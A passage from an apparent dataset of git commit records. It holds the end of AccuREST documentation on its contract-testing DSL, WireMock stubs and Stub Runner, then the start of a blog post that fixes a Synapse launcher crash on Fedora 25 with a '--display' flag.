<goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*][][]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d63a441fddd6b87e8cef8c880d209256d9514cc3","subject":"Update 2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","message":"Update 2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_contents":"= Fedora25: Synapse and Your Display Server\n:hp-tags: fedora, linux, synapse, launcher, solution, terminal, display, wayland, Xorg\n\n## The Problem\n\nOne of the tools I've constantly used when on a Linux distribution is https:\/\/launchpad.net\/synapse-project[Synapse]. It's a really fast application launcher. I've tried https:\/\/github.com\/ManuelSchneid3r\/albert[albert] and others but none have pleased me as much. Since I switched to Fedora25 back in December 2016, I've been using GNOME's built in search which resides in the dashboard. It suffices but the rendering required can cause it to be a bit laggy when resources are being hogged (especially by Chome \ud83d\ude22). So I've decided to install Synapse. Unfortunately after installing, it wouldn't launch from the application menu. I opened Terminix and typed `synapse` only to see it crash from a segmentation fault \ud83e\udd10. I decided to Google search the issue and came across these links:\n\n- https:\/\/ask.fedoraproject.org\/en\/question\/98598\/i-get-a-segmentation-fault-when-starting-synapse-on-fedora-25-what-to-do\/\n- https:\/\/www.reddit.com\/r\/Fedora\/comments\/5j31sd\/synapse_on_fedora_25_fails_with_segmentation\/\n- https:\/\/bugs.launchpad.net\/synapse-project\/+bug\/1592008\n\nUnfortunately everyone was complaining, but no solution.\n\n## The Solution\n\nI figured it was synapse trying to access memory or a stream that doesn't exist. So I checked `syanpse -h` to see what options are available. One of the options available to use `--display`. You can get synapse to successfully start by the following steps.\n\n 1. check the location of the displays you have available: `cd \/tmp\/.X11-unix && for x in X*; do echo \":${x#X}\"; done`\n 2. then, from the locations listed, try using any as arguments to the `--display` option.\n\nFor me, `synapse --display=:0` worked just fine.\n\n**NB: This allows you to manually launch synapse. However, you MAY want to ensure that:**\n\n 1. When you start synapse from the application menu it launches with the options you desire.\n\n * append ` --display=:0` to the end of `Exec=synapse` in the file `\/usr\/share\/applications\/synapse.desktop`.\n * You WILL need **sudo** access to do this. *Be mindful of the space in the string you will be appending.*\n\n 2. If it's autostarted from your startup it is launched with the options you desire.\n * ensure you have **GNOME Tweak Tool** installed. *Install it using `sudo dnf install gnome-tweak-tool` or install it from the **Software** application*. \n * Then navigate: Tweak Tool>Startup Applications>\u2795. Search for Synapse then click \"Add\".\n\n 3. Navigate Settings>Keyboard>\u2795. Enter Name: \"Synapse\", Command: \"synapse --display=:0\", Shortcut: [Whatever keyboard shortcut you desire].\n \nThis should suffice as a solution until a patch is made.\n\n\n[footer]\nThis has been tested on fedora 25. Provide feedback as to whether it works on other distributions that are returning\n```\n[INFO 10:45:12.413170] [synapse-main:266] Starting up...\n[INFO 10:45:12.625883] [synapse-main:208] Binding activation to <Control>space\n[1] 27269 segmentation fault (core dumped) synapse\n```","old_contents":"= Fedora25: Synapse and Your Display Server\n:hp-tags: fedora, linux, synapse, 